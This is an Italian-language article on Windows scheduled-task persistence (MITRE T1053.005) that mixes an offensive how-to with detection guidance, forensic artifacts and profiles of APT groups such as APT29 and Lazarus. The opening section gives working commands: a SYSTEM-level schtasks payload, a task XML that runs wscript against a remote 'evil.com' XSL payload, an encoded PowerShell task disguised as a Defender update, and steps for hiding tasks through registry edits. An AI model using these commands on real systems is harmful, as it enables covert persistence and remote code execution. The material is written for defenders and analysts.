Task Scheduler: Scheduled Task/Job - Scheduled Task (T1053.005)

Per comprendere come gli avversari sfruttano questa tecnica, iniziamo con l'approccio più diretto. Il comando base per creare un task persistente è:

schtasks /create /tn "SystemUpdate" /tr C:\Windows\Temp\payload.exe /sc ONLOGON /ru SYSTEM /f

Questo crea un task che esegue il payload ad ogni login con privilegi SYSTEM. APT29 ha raffinato questa tecnica utilizzando task hijacking: invece di crearne di nuovi, modificano task esistenti e legittimi per passare inosservati.

Per replicare l'approccio di Lazarus Group, che utilizza script XSL remoti, create prima un file XML con la definizione del task:

<?xml version="1.0"?>
<Task xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><CalendarTrigger><StartBoundary>2024-01-01T09:00:00</StartBoundary></CalendarTrigger></Triggers>
  <Actions><Exec><Command>wscript.exe</Command><Arguments>//b //e:jscript https://evil.com/payload.xsl</Arguments></Exec></Actions>
</Task>

Quindi importatelo con: schtasks /create /xml task.xml /tn "MicrosoftSync"

L'approccio PowerShell offre maggiore flessibilità. Il cmdlet Invoke-CimMethod permette di creare task attraverso WMI, bypassando alcune detection:

$Action = New-ScheduledTaskAction -Execute "powershell.exe" -Argument "-enc <base64_payload>"
$Trigger = New-ScheduledTaskTrigger -AtStartup
Register-ScheduledTask -Action $Action -Trigger $Trigger -TaskName "WindowsDefenderUpdate" -User "SYSTEM"

Per nascondere completamente un task come fa FIN7, eliminate il Security Descriptor dal registro dopo la creazione. Questo richiede privilegi SYSTEM e manipolazione diretta delle chiavi in HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree.

Un approccio avanzato prevede l'uso di COM per la creazione programmatica. Create uno script VBScript che utilizza l'oggetto Schedule.Service per maggiore controllo sui parametri del task, inclusa la possibilità di impostare trigger multipli e condizioni complesse di esecuzione.

Il monitoraggio efficace richiede un approccio stratificato che vada oltre i semplici event ID. L'EventCode 4698 registra la creazione di nuovi task, ma gli attaccanti sofisticati modificano task esistenti, generando l'EventCode 4702.

Create una detection rule che correli questi eventi:

• Task creati con schtasks.exe ma senza corrispondente evento 4698 (indica uso di metodi alternativi)
• Task che eseguono da path non standard come %TEMP%, %APPDATA% o C:\ProgramData
• Task con nomi che mimano servizi Windows legittimi ma con typo ("WindwosUpdate", "MicrsoftSync")

Monitorate i processi figli di taskeng.exe e svchost.exe -k netsvcs. Pattern anomali includono:

• Esecuzione di PowerShell con parametri encoded
• Lancio di wscript.exe o cscript.exe con URL come argomento
• Processi che scaricano file subito dopo l'esecuzione

La baseline è fondamentale: documentate tutti i task legittimi nell'ambiente. Task che appaiono durante weekend o fuori orario lavorativo meritano investigazione immediata. Gamaredon Group è noto per creare task con nomi randomizzati di 8-12 caratteri, mentre APT32 preferisce nomi che imitano aggiornamenti di software comuni.

Per ridurre i falsi positivi, whitelistate i task creati da sistemi di gestione come SCCM o GPO, ma validate sempre che il processo padre sia quello atteso. Un task legittimo creato da SCCM avrà ccmexec.exe nella chain, non explorer.exe o cmd.exe.

Implementate correlazioni temporali: task creati entro 5 minuti da download di file eseguibili o accessi RDP sono altamente sospetti. Monitorate anche modifiche al registro sotto TaskCache\Tasks che non hanno eventi corrispondenti nel Task Scheduler log.

L'analisi forense dei task schedulati richiede l'esame di molteplici artefatti per ricostruire la sequenza completa degli eventi. Il file principale è C:\Windows\System32\Tasks, dove ogni task è salvato come file XML con timestamp di creazione e modifica.

Il registro contiene metadati critici in tre location:

• HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree - struttura gerarchica dei task
• HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks - configurazioni dettagliate con GUID
• HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain|Logon|Boot - trigger di esecuzione

Estraete i timestamp da questi artefatti per identificare task aggiunti durante il periodo di compromissione. Il registro mantiene anche i LastRun time che aiutano a determinare quando un task malevolo è stato eseguito.

APT29 durante SolarWinds Compromise ha dimostrato sofisticazione modificando task esistenti e poi ripristinandoli. Cercate anomalie nei timestamp: se un task di sistema mostra data di modifica recente ma il contenuto XML ha timestamp più vecchi, indica manipolazione.

I log di Task Scheduler (Microsoft-Windows-TaskScheduler/Operational) forniscono execution history. L'EventID 200 mostra l'avvio del task, il 201 il completamento. Correlate questi con i log di Security per ricostruire l'intera catena di esecuzione.

Per task nascosti, verificate discrepanze tra il contenuto della cartella Tasks e le entries nel registro. Task presenti su disco ma assenti dal registro indicano tentativi di hiding. Tools come Autoruns potrebbero non vederli, richiedendo analisi manuale.

La memoria volatile può contenere tracce di task in esecuzione. Se acquisite durante l'incident, cercate istanze di taskeng.exe con command line sospette o processi orfani che potrebbero essere stati lanciati da task già eliminati.

APT29 rimane il master indiscusso nell'uso sofisticato di scheduled task. Durante il SolarWinds compromise, hanno utilizzato task hijacking modificando task legittimi per eseguire i loro tool, ripristinando poi la configurazione originale per evitare detection. I loro task utilizzano nomi che si confondono con servizi Microsoft legittimi e trigger multipli per garantire esecuzione.

Lazarus Group mostra un pattern distintivo: creazione di task che eseguono script XSL remoti ogni 90 minuti. Questo approccio permette loro di aggiornare il payload senza toccare il sistema compromesso. I loro task spesso includono parametri di rete nel nome o negli argomenti, facilitando il C2 communication.

FIN7 si distingue per l'uso di task nascosti attraverso la rimozione dei Security Descriptor. I loro task tendono ad avere nomi brevi (4-6 caratteri) apparentemente random ma che seguono pattern identificabili quando analizzati su larga scala. Utilizzano prevalentemente PowerShell encoded commands con layer multipli di offuscazione.

Gamaredon Group preferisce la quantità alla qualità, creando numerosi task con nomi randomizzati per garantire ridondanza. I loro task tipicamente eseguono VBScript che scaricano ulteriori payload. La persistenza viene garantita attraverso trigger multipli: startup, logon, e intervalli temporali di 10-30 minuti.

L'overlap negli strumenti è significativo: PowerSploit's New-UserPersistenceOption è utilizzato da almeno 15 gruppi APT diversi, ma ognuno lo implementa con variazioni uniche. OilRig ad esempio, combina scheduled task con altre tecniche di persistence, creando task che ri-creano altri meccanismi se rimossi, dimostrando un approccio defense-in-depth alla persistence.

Framework MITRE ATT&CK T1053.005 - Scheduled Task. Riferimenti alle campagne: SolarWinds Compromise (C0024), Operation Dream Job (C0022), Frankenstein Campaign (C0001). Detection: Event ID 4698, 4702, Sysmon Event ID 1, 11, 13. Risorse correlate: PowerSploit Framework, Atomic Red Team T1053.005.